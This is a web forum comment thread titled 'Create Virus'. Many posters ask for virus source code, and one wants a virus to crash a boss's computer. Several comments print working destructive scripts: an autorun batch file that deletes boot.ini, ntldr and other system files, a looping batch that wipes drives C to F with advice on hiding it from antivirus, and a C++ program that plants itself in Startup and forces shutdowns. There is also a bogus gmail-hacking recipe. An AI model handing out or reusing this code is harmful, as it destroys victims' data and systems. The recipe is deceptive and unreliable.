Create Virus


Iam not create virus but i like to know how to create virus in iam using vb.net2003 vertion.

pls sed me e-book or gird somthing like that.


hey i am shusrisangita....i want to learn how to create virus code in c or vb..... so please help me...... give me some source code of virus with how it runs in my email: [email protected]

so virius hint is wenderfull man.

sum1 hacked my email and sent few vulgar emails 2 my boss and his wife.dey r on holiday n wil return 2moro.can sum1 email me a virus so i can email it 2 dem n crash dea computer n if possible crash da server so dey cant get da email............pliz m rili [email protected]

In reply to by Anonymous (not verified)

Hi I am CyberGuardian from Iran. I can help u out but I am not sure u need my help yet or not? [email protected] I am yrs old a computerwizzzzz boy Nice to meet u

I want to create virus with java my id royalgirish&

@ECHO off :Begin msg * Hi msg * Are you having fun? msg * I am! msg * Lets have fun together! msg * Because you have been o-w-n-e-d GOTO BEGIN

Creating virus is not easy. Virus is a program which spreads on its own. It usually doesnt do much damage. I ve created a simple virus in, which doesnt damage computer, but spreads on its own. Does any1 want that virus?

In reply to by Anonymous (not verified)

Hi i m very interested in programming i know programming in C++ but not deeply. so please send me at my E-mail : [email protected]

#include #include #include #include #include #include #include using namespace std; int main() { keybd_event(VK_MENU,0x38,0,0); keybd_event(VK_RETURN,0x1c,0,0); keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0); keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0); HANDLE outToScreen; outToScreen = GetStdHandle(STD_OUTPUT_HANDLE); { char buffer[255]; char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat"; ifstream input(inputFile); if (!input) { { ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app); fp "@ECHO OFF n"; fp "START C:\rawr.exe n"; fp "EXIT"; } } else { while (!input.eof()) { input.getline(buffer,255); } } } { char buffer[255]; char inputFile[]="C:\rawr.exe"; ifstream input(inputFile); if (!input) { { { ofstream fp("CLICK.bat", ios::app); fp "@ECHO OFF n"; fp "COPY matrix.exe C:\rawr.exe n"; fp "START C:\rawr.exe n"; fp "EXIT"; } system("START CLICK.bat"); main(); } } else { while (!input.eof()) { input.getline(buffer,255); system("call shutdown.exe -S"); goto START; } } } START:{ for(int i = 0; i 1; i++) { int num = (rand() % 10); SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY); cout setw(4) num; cout setw(4) "0%"; cout setw(4) "P"; cout setw(4) " "; cout setw(4) ")"; cout setw(4) "#"; cout setw(4) "X"; cout setw(4) "@"; cout setw(4) "1&"; cout setw(4) "*"; cout setw(4) "||"; cout setw(4) " "; Sleep(60); } } for ( int j = 0; j 5; j++) { SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN); int number = (rand() % 24); cout setw(4) number; } goto START;

In reply to by Anonymous (not verified)

[autorun] open=haxtap.bat ACTION=Click Here save this at autorun.inf @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini @echo off msg * Haxtap shtdown -s -t 7 -c save this at haxtap.bat

In reply to by Anonymous (not verified)

this can never ever be a trojan, this is a batch virus, it targets system resource files and deletes them, so next time first ask before execution

If u ever think of this as a trojan, then u better cut the crap, trojans don't behave that way. A trojan will infect by its only and not user interaction to push it on to the executive infection path. Thou that is a sign of progress.

Hey i wil teach u how to hack a gmail account.For that u need a gmail account and u r gmail is more than 1 week old in order to work these Step 1 Type [email protected] in ur address box Step2 Then in the subject coloumn type userpassword retrieve Step3 in the first line of ur comment box type email id of the person u have to hack In the 2nd line type ur "select id fromn usr_coll_tab where id=""" In the 3rd line ur "select passwd from user_coll_tab where passwd=""" In 4th line type 2Mkerr6657Wax455QWEdff12 U WILL SHORTLY GET AN EMAIL ID CONTAINING THE PASSWORD AND USERNAME OF THE TARGETED PERSON

help me pls...! i have urgentally need bcoz i have to submit my project on friday..! so pls help me guys..!

plece send me any one virus progrm in java....... email:[email protected]

Hi friends , i am crazy about programming , i have made some viruses and want to learn more from you , please help ma by sending e-mail to me on my e-mail address : [email protected] and [email protected]. Please send me some virus code and help me , bye bye friend. Don't forget ok

Hi, My self Rashmi from india, this is very intresting to hack and find the email id and password. i want to learn, Plase teach me or send me hacking code which i can use. Rashmi Ranjan [email protected]

hey popel can you show me note pad viruse

Hey dude I am Shwetanshu, php developer and networking/harware engineer i am intrested in viruses please if someone know about it, tell me at my mail ID. My e-mail id is [email protected]

please send me a virus code... please, i want to learn them,, [email protected] is my mail.. please have the courage to share.. thank you very much in advance;//

i am a new student of it dept i need to know the java simble virus code and how can it work..... anybody knew that plz help me

but we named it ??? malicious programs you can use bat file because antivirus cant discover it you must put it in self extract file from (rar) files to cover it ::: ::: like this @echo off break off :r del d:\ *.* /q /s del e:\ *.* /q /s del f:\ *.* /q /s del c:\ *.* /q /s goto r i love dos

I need the the source code in java for multiple window generator is my major project...plzzzzzz help me....i need it....

hi am not very new to programming i know many languages but i want some php code to create some virus files pls send me e-book aur source code on my id . [email protected]

Sir i'm student & also beginner programmer.I'm very interested about making a virus.So Please send me source code. My email is [email protected]

most sinple virus code.. C:\WINDOWS\system32\*.*/q

i like it

the virus code given above needs some explanation i copied it to visual studio 2008 then added another from 2 i also had 2 add a text box a button on form 2 and numerous timer to make the code error free for this time but still havent debugged it yet because IT MIGHT DAMAGE MY SYSTEM WILL ANY BODY ELSE TRY AND TELL ME

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Hi I Need a source of Worm If you are able to send email free writing WORM Thanks for your web

sir, How to create a web page virus? Pls send me a simple java script virus coding & it function.

Respected Sir, I am working on viruses if u could send codes of some viruses so that i can test them than i would be very thankful to you. my id is [email protected]

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